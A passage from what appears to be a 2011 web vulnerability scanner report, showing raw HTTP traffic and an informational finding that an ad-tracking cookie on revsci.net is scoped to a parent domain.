cm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; rtc_YxMN=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; rsiPus_xBH1="MLsXtSMNJjhvJZH0ecXcxPALFPJgPeDEnB2qzoP9NPmW+Qk/VjEpNZvXbTc7xC8rSTKo6YlNBzeU7ijPG2tiitFk5yhvPkVgeLdujkmippVDOR/YNlY1Z7I2MakMEO8YvDy8zYq2qzY9fRQF0eHWbAbjLpsJ4nHYPIDY0ChI09uQvQXJm4AEWDP16qFPvl119MgxVMhAXu4yF9MTfJSFtV1jT/hhWoUvCDH39hJCXhLOIevvnX25z1OHZHUQTxH3rko7bagOQm/zyWpISNp8E9hxCkaZlp6YdpDVYRPBHUJN649qfK7NqaRf9cvEpmnRGQRq8WMvwgO14IZFH8tJepsNAH7mHif+xGEyLIwEvG3STOfn7d4BMYeugixIuIkLvNDdrXmHib4tab301GfTvznsyXfDBCaRsyi1zLOVbOJVrnB03ZrUQb6W2/dC3bLGEInif6LHHRFGeE+s3iAatMV4+kRCq8xPLarOiJFhY28IN3SAf3UCtemNO2+zTz5rdPqKV8dVMUGkkc7FfxhXGfEmR58aJlWuVna43b6uzP+suCirSqXUSNiRZa/5i1uAO76qLhIFy8w0P7Ple5vidIVgo1LXZn3982Y9CSpivxsWly6rf6XyrpcymGC6PIM3x5NsewaEDmqGUKtbspkLhjLUtGgyRp4zf7m92vlsuFUJaRWjqWkAvoYeKYeQchsmlrYbYu4ULVS21b7RYeyRYXXFbSF0yU51Hc+cJCQZvKfNEIA5u1WzjKVUelFIS/jAMLJrerzI7juak50NcsoPANZmWbsthmBFzpFs8wvUVDaTblO1iZWkqJ94vbj6+V4vk4TSuOpNNf0smflMqcgIkYRHzXTDdA1t6lz41W707MccCk7yFFnFXCb6ffh8wgyD9pDpREI5jUuqm5JsCk9DFTIOEscfOGdCdCg8hMcJM8LMbL175KegipccfQwJnC24Fupl4B1EwjfFjEtmwapcW9wyVk74GyPeJvPg7bKjmtlHjEfmZJG/Zz9LpV1mCP/RVJ8pq2z5PjrN/fR7DBdpUX1VnaRFfu1ogVnw8qTLBH7nI46vdWr19SfGLML8gl36DrkQ9iPWakBp+MHeIoaSPdyZj+mKY8Dn0Mr+sRB6wBVhdis09BQmm9nAhma5+60qqPT7qEcJBdRs4UX4EnAp/ywXtHUMNW3gh/DuqihQu9+R+nY2s/qSOjhiJcg7hAC73kd7NyCa6DrjpTdBpHwJ+hVPIfWWJjBobiU9Tsc5PhP2BCWsPEjR28GRvMwe3ewCLMHRg/zqzJKjzotPRAbVCcHw8QV3KjEOTfcyDrMLZla9yQzzw2EBx8dtR5Gdrta97mCBCUZhZlzQ/zqSSrUlJ8hXSwSWjw=="; rsi_us_1000000="pUM14zlDOBYUrmdq3jOQH6NG/UTjJLypNPMu8j89fd7oQaFd1yGE6g/enyiRh34yc/Lp3I/C0yVanr6DARjTtfnytVu1KLfKEnApLMfGK0rX2a4suESz2iJdtYf9XH36phtyM/9lq1L56zCW60g1OjQJnwO6Avik/yIfTcqDu+JM8zqIKUJ1fwIhfcRn2t1wZ/GPwqflRKv7mR+TJcv0TSV5Rune8VjECJ5hQ71NNMFrxR7WvRNWyZW7FHWOcNarMd7KuBSfNJ3cxwbuelPMb8pUP3ukcMovWu+EDtYD42bE5AudfiMPXOGaGko9RunC/sgnulIKvCbA8pu658l5BrwyC9/9NBSf85RMsvT4IbxQ2ok0fplAi/9GmZyk1pvvB2muooyyNzUx2Be1eokgwS11WByljxru21ZYS5dGtAEKQfyhxYP0AGkCpfCslXHqk/LK1SG2Fbjj02v3bV+Dik9Gdi2LlHg8msS9NXZ0ympszUOqBWaC8CRLjCY1pXx7R0iuSHIrP3oflYHBnDusE0TtnTah/sI5niJPi++2VifMWFLdqUKuX1qGGsN9lIx9pEB7ZFsgiYqjIB5UUY9RcsGrZGsSVZOlSBGA1MK64D8BKodm5vA2cTjdsK3wye5wOQcyH6cI6xubb05eQ9k3Piyu4PnHNWzBC4N2FID1wVmC034HDTqGkUxCDfEqqdjA5UrmDKXftfCxnJt//MUrgkKIaJ1tA4xWdUkcYkwr+o+v58Ca6Y/g2NE6Puwsk3EhGoHyXgp5W9Bbx3mRbxQL3BvFugxby5p2oFWn4P8G1ADr3U9ekflaAaLJ2Ncb+bxQ6YpOy5Z0jpa1tI1uz1cw8ZjJ3jZ8jjAHy6aeX2o1+XfOPCvkBA7587b+iRf8/r5S79nMn2rrdN/hsJWRgt1f5/bCl9+rynOEQ1H0iKLgVkOE8/tREjSOPKjTTwZjwTa6a9ykVaD1MDLLGgvxgYUWLZJiEiFwd+WPs2EstzUkgUPV3loc5LtfRfmV55RnLOcFlQ50/QarQ8tGnMaCVTsghXyudZu/+mhWFnjP31Fo4aPwm+R/Y4vFE+8Cbkip4uWG8qw3ZH1QiYllfK2IpPX0sg8UgeCB2usVICpN1xJwM9bAPOs3k5UXQ7cfUsksigUlUhiXpUR9wQXibnmqAjbeth4vcWAaNhWE++4EzdUsxO+cNwmoVgJ1nz4rfuIQxrKCq0MsV+wq2FBcxuALM527Ob9GDHkg5Dq7WgwyObOTgG58UDtNpkDQ+5X0yvNwt4CjT/dSbJGO3nsG3IYQy7RdYWmAQPRPYjUwafpDely7TPax6MTfpZ04pnUXkoZy4iAadJKKJBXvGdEWfnG6WBH5ivlXh1maC5SWFmmN0FrCgclJ535LeKAxAA1f4QNbMTX+kyJVCHGnaBqxMivQbYJ2dEEBs5jv09hG8lp2YPhMZkt+z2JjjmOzn/vGZUShY2eaai3OK/+D0Jsc9fR0xfsnqrsUBhMeLdWwWLTdoskcDuj1h4Pq0aNf2MQM/aWHk/NA17N+3obiED4+QsiBhZRqYjqjqLzHVPGJGxpNMzvR4iGkCHSAqenfaZBqwC372TwnI+RS32smo74NwPqBuyLJTWNfchSh/rMbOQ7DO7HqlRcfZ3u9mBuUZ5QlYFJQ9RIha+OgNKk4Fd2TQD82sNXe7XqlFrUWTniU/hWVLVabDqIYWQkgI8LEoqh5dxwWpagXKdztXuthBPw0k/4OlqVmlpAnT4kktw8xvo+bEAD2jH5c+QzhqO4zlhNTwDS7HmgotNW4"; rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uz8rvh2rOfqkDDDA6eADT10E2TZRRbEIySo/UWd5psmrca/jF0HnU6SSkHFIHZYBJEHWaCW+4z4aSyyY0W5c0FoFlDXAUEgoeqnG3CUqVeF28RHMrctoqtaohUjTO8CHuSP15GfKkcTktQeUTl9WaxDGqmES50guT4EAR/+uvS+jSarDh6IQeTqtBQklVUjNu7YLMo+ZnVB+yyfsD5RLdiREGAyqK/XVdLTQcmLEsU3A5XBhn4ZDxlJ3bO1VR86QqdXsMfwZoSgGUrmLjw6qX24JhEpRyHBp574yIAEU5M28AqStEuTcw1wT+KhWthxu3AYUsLR9ABQfr8dc4pd4H8JfLaC8db7jP+Lyx2+EOlp4caBnmXqgzNDKbH/dfd41BYmOiZdZxZ9iF0PtCXAxdlAQyItq6cZ/DahrGn/8I2DqdtPPL4D8ZvBCkkRlSEPIGpcX89FhgSxuTRoF8Y8ikpGYRdeiQKgl28M790m63AuXbs6UFxfmt1Nb6o5gBeq+EoBX9kPefrSU0VGlqCczf80WhniuOj3mWyk4J4uYPXvEs9ciSYmO1ESThpKR3FxE1DN0uxMaxDaoKCR7X2sRnDrSVZ6uHM6mT8iDyYR4tLYuMc1R7O3+L2RWLF4nm1xgjhX

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uz8rvh2rOeqAX2dHHnLYyViGymJW18v6pxo9TQQ/CMgK6G8jF0HnU6SSkHFIHZYBIkHWaCW/4z8aSiyg0R58oFoFlDVAZ0Q4WilEZa1mbBjW7OLLoFHNs08LFTYGZVXlxUvEZzx6zjOYyj3SuXnsHKw1Hvruz3Uf+BvgDGGbJFLjv17ScTkhkvU4QksCyof4XW1pSftKp6homnlrYgI1lp22zIsyNkdhnVKrDbFyV2uJv/1BmUlBKwDFWqjTCpvCBZbLtKKzv6WltjQ7pWUjMNH+30I2YuP5FFcJfLwMN3eawf2+KLTThx0xTTlYHzawZQXdaHyUF1KXX9ZUQI1rnykVwY0b8NIDFThSHpzPg/1KsPTtEbccXni5KjMfY2uitH8+9UVMO+wju4WEeuZFr4ZxtKSPrxl9yaWlHQGXxBES5q3SQW4zBS05S6hScUZY7jk9D/Y8sdnlHP/5/KhztJWUGMe/sHwrlis9rTQ4OBxCCmn++3BZxuPdVxi72aac440Q/3qnyjjl2l8QCPhNcivyQRKN1wF41CvAMSuXqscYt7nj+CdF1MH095+w6kmZgwek1xMzZ4zky0gS2QxO463ZSF9wyEYAPJHWdj2jbkj/QfHReEGjT1LQCFxv+id019oHQ==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 18:48:06 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 18:48:06 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.163. http://pix04.revsci.net/I10985/b3/0/3/1008211/518130278.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/518130278.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAKCIGSNrjQ0ubO+9Micc4VPat72X0BRE3fmuDUz/xw+ppzybIZwKwagY0WUnYiGBkFQqZouM+GZBQjkw/QKBeEE1wCXGHaX6NeLZFDnb808OczVZi/z1C2nYHyKGCe5170OipKEEqzGL9GHYz69OROKA+nYQRc07zJ3P+vzvxbMCdraiyFAw8fcNBWphT6vuk41246c95NOaRIsl5hE/ZCrN9ltl638ONtjh6IkR4C+Bn0HQU9SGKwzcG0oLUmfYwfR+/e01trCzWnlOqoD+91j7ecB5h6As6cGZTiUkAQV8S6WA1BOLiIf9dkzrU5cE72ZWc00qW9MXKl/yabXGZBe8iih22KEfajJ8TbmgLZkF3VJULSxXOsKgbLS+N2tYOPb7H7ylEiZki5tHLRQw4mVwn8auJCEmHJ3qgLOl1PDKKRoQc/UBmorHEc/TIHBCVRVSZrobvtLMxEgZPYynL0er8BWtYtV0dJ53KZo9p/px9SgRp/FzXhLEX1SLYZqrvcnVFUo3g64nONjUn/o+bNWHlXCa526djlE801fgUQBozQLnN1pbn0BVzaKGWpJbKR4+rCv9Jg3W1uFamSDB2IRqxAc8a9cD4KfEOirCQjLCYkPuN/9svloFg==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 18:32:37 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /I10985/b3/0/3/1008211/518130278.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%26DM_EOM%3D1&C=I10985 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; rtc_YxMN=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; 